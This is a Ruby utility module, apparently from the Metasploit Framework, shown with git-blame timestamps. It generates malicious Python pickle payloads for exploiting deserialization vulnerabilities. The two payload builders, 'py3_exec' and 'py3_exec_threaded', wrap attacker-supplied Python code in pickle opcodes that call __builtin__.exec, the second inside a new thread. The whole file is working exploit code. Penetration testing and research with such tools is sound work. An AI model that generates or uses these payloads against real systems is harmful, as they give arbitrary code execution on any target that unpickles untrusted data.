2023-10-10 14:01:24 -04:00
|
|
|
# -*- coding: binary -*-
|
|
|
|
|
|
|
|
|
|
# Python deserialization Utility
|
|
|
|
|
module Msf
|
|
|
|
|
module Util
|
|
|
|
|
# Python deserialization class
|
|
|
|
|
class PythonDeserialization
|
|
|
|
|
# That could be in the future a list of payloads used to exploit the Python deserialization vulnerability.
|
2024-03-28 17:44:22 -04:00
|
|
|
# Payload source files are available in external/source/python_deserialization
|
2023-10-10 14:01:24 -04:00
|
|
|
PAYLOADS = {
|
|
|
|
|
# this payload will work with Python 3.x targets to execute Python code in place
|
|
|
|
|
py3_exec: proc do |python_code|
|
|
|
|
|
escaped = python_code.gsub(/[\\\n\r]/) { |t| "\\u00#{t.ord.to_s(16).rjust(2, '0')}" }
|
|
|
|
|
%|c__builtin__\nexec\np0\n(V#{escaped}\np1\ntp2\nRp3\n.|
|
2024-03-28 17:27:48 -04:00
|
|
|
end,
|
2024-03-28 17:44:22 -04:00
|
|
|
# this payload will work with Python 3.x targets to execute Python code in a new thread
|
2024-03-28 17:27:48 -04:00
|
|
|
py3_exec_threaded: proc do |python_code|
|
|
|
|
|
escaped = python_code.gsub(/[\\\n\r]/) { |t| "\\u00#{t.ord.to_s(16).rjust(2, '0')}" }
|
|
|
|
|
%|c__builtin__\ngetattr\np0\n(cthreading\nThread\np1\nVstart\np2\ntp3\nRp4\n(g1\n(Nc__builtin__\nexec\np5\nN(V#{escaped}\np6\ntp7\ntp8\nRp9\ntp10\nRp11\n.|
|
2023-10-10 14:01:24 -04:00
|
|
|
end
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
def self.payload(payload_name, command = nil)
|
|
|
|
|
|
|
|
|
|
raise ArgumentError, "#{payload_name} payload not found in payloads" unless payload_names.include? payload_name.to_sym
|
|
|
|
|
|
|
|
|
|
PAYLOADS[payload_name.to_sym].call(command)
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
def self.payload_names
|
|
|
|
|
PAYLOADS.keys
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
end
|
|
|
|
|
end
|
|
|
|
|
end
|
